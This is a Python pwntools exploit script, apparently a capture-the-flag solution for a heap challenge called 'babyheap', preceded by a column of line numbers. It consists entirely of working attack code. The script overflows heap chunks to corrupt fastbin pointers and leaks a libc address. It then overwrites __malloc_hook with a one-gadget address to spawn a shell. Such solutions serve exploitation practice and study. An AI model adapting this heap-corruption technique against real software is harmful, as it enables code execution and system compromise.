1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

from pwn import *

 

def allocate(size):

        sla('Command:','1')

        sla('Size:',str(size))

 

def fill(idx,size,fill):

        sla('Command:','2')

        sla('Index:',str(idx))

        sla('Size:',str(size))

        sa('Content:',fill)

 

def free(idx):

        sla('Command:','3')

        sla('Index:',str(idx))

 

def dump(idx):

        sla('Command:','4')

        sla('Index:',str(idx))

 

r=process('./babyheap',env={'LD_PRELOAD':'./libc.so.6'})

e=ELF('./babyheap')

libc=e.libc

 

sla=r.sendlineafter

sa=r.sendafter

ru=r.recvuntil

 

for i in range(4):

        allocate(0x10)

allocate(0x80)

 

free(2)

free(1)

 

pay=p64(0)*3+p64(0x21)

pay+=p8(0x80)

 

fill(0,len(pay),pay)

 

pay=p64(0)*3+p64(0x21)

fill(3,len(pay),pay)

 

allocate(0x10)

allocate(0x10)

 

pay=p64(0)*3+p64(0x91)

fill(3,len(pay),pay)

 

allocate(0x80)

free(4)

 

dump(2)

ru('Content: \n')

leak=u64(r.recv(6).ljust(8,'\x00'))-0x3c4b78

log.info(hex(leak))

 

allocate(0x68)

free(4)

 

pay=p64(0)*3+p64(0x71)+p64(leak+libc.symbols['__malloc_hook']-35)

fill(3,len(pay),pay)

 

allocate(0x60)

allocate(0x60)

 

pay='\x00'*3+p64(0)*2+p64(leak+0x4526a)

fill(6,len(pay),pay)

 

allocate(12)

 

r.interactive()